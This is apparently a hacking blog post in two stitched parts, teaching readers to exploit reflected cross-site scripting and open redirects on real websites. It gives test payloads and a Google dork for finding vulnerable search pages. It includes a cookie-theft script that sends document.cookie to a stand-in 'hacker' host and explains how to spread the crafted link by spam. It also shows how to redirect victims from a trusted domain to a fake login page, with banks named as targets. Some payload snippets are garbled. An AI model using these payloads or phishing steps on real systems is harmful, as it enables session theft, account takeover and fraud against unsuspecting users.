How to hack a website using Cross site scripting (XSS)

What is  Cross site scripting :-

As quoted in wiky
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."

There is no single, standardized classification of cross-site scripting flaws. but most 
experts distinguish between at least two primary flavors of XSS non-persistent
and persistent to know whats persistent and non persistent click here

In this tutorial i will explain about  Non-Persitent attack 

First of all you must find a vulnerable site .( for this you can refer
my post on How to find a vulnarable site )

After finding  a site enter a simple java script given bellow in the serch box or url bar

<SCRIPT>alert("XSS testing by hackhaholic.blogspot.com");

 If a dialog box  pops up as shown then the site it is vulnerable to xss

In the above example we added a harmless alert dialog box
In the next example i will show you how we can add  more sophisticated and
dangours XSS attack to exploit users
One typical example is a simple cookie theft exploit
.

 var+img=new+Image();img.src= "http://hacker/"%20+%20                            document.cookie;

The previous JavaScript creates an image DOM object.

var img=new Image();

Since the JavaScript code executed within the http://victim/ context, it has access to the cookies

The image object is then redirected to hackers website where the victim cookies are stored

img.src="http://hacker/"%20+%20document.cookie;

Once the hacker has completed his exploit code, which looks like

http://victim/ context=">">+var+img=new+Image();img.src= "http://hacker/document.cookie;

Now the hacker will advertise this specially crafted link through spam e-mail , message board posts, Instant Message (IM)messages, and others, trying to attract user clicks. What makes this attack so effective is that
Users are more likely to click on the link because the URL contains the real Web site domain name, rather than a look-alike domain name address as in normal phishing

Phishing The Smart Way Using XSS Vulnerabilities

What is Cross Site Scripting?
It is a vulnerability typically found in web applications.A hacker can use this vulnerability to inject client-side script into web pages viewed by other users. 


What can an attacker do with this?
 Attackers can do the following things

•  Steal user cookies and can take complete account takeover
•  Steal data on web pages viewed by victim
•  Deface pages viewed by victim
•  Use web pages for phishing

In this article i am going to explain how phishing can be done using XSS vulnerability in web applications.To understand this, you need to have the  knowledge of normal  phishing.


Advantages over normal phishing:
In Normal phishing the victim will be given a link which is made by the hacker. A person with basic knowledge can recognize that it was a fake link.But in XSS the victim cannot suspect the link because it contains a trusted URL.


Demonstration Of XSS -Phishing 
Steps involved in the attack

• Finding a XSS vulnerability
• Craft your link.
• Send the link to your victim

Step 1: Finding a XSS  vulnerability
First we need to find a vulnerable website. This can be done using google. Go to google and search using the following Dork.

inurl: "search.php?q="
To test the vulnerability you can inject the following code in search fields,comment fields of your website.
<script>alert("you are hacked")</script>

If it returns an alert box showing “you are hacked”, That site is vulnerable to XSS.


Step 2: Craft your link.
In this step we have to craft a link from the vulnerability of the website.
Your link will look like
http://site.com/search.php?q=<script>alert("you are hacked")</script>
You can use your specially crafted link to steal your victim’s information just as in phishing.


EXAMPLE:

I am showing you an example with vulnerable link found in google.
Note:
This link is kept here for demonstration purpose only. I will not be held responsible if you do any thing illegal with this and this bug is not fixed yet. If google fixes it,it may not work.


http://www.google.com/search?btnI&q=allinurl:http://www.101hacker.com/
(credits- wolfmankurd)

When  the victim clicks this link,he will be redirected to http://www.101hacker.com/ 

You can replace “http://www.101hacker.com/” with your fake login page’s link.Then it takes the victim to your fake login page.


Step 3:Send the link to your victim
Now you can send your specially crafted link to the victim by any means as you do in normal phishing.


Conclusion:
This is such a dangerous vulnerability in web applications. It got 2nd rank in OWASP top 10 vulnerabilities.If a hacker finds this vulnerability in any of the bank websites, he can attempt a malicious attack against the customers of the bank and steal lots of information like credit cards, account numbers, passwords etc by simply sending a group mail to the customers of the bank.

Read more: http://www.101hacker.com/2011/10/phishing-smart-way-using-xss.html#ixzz27PLenzWf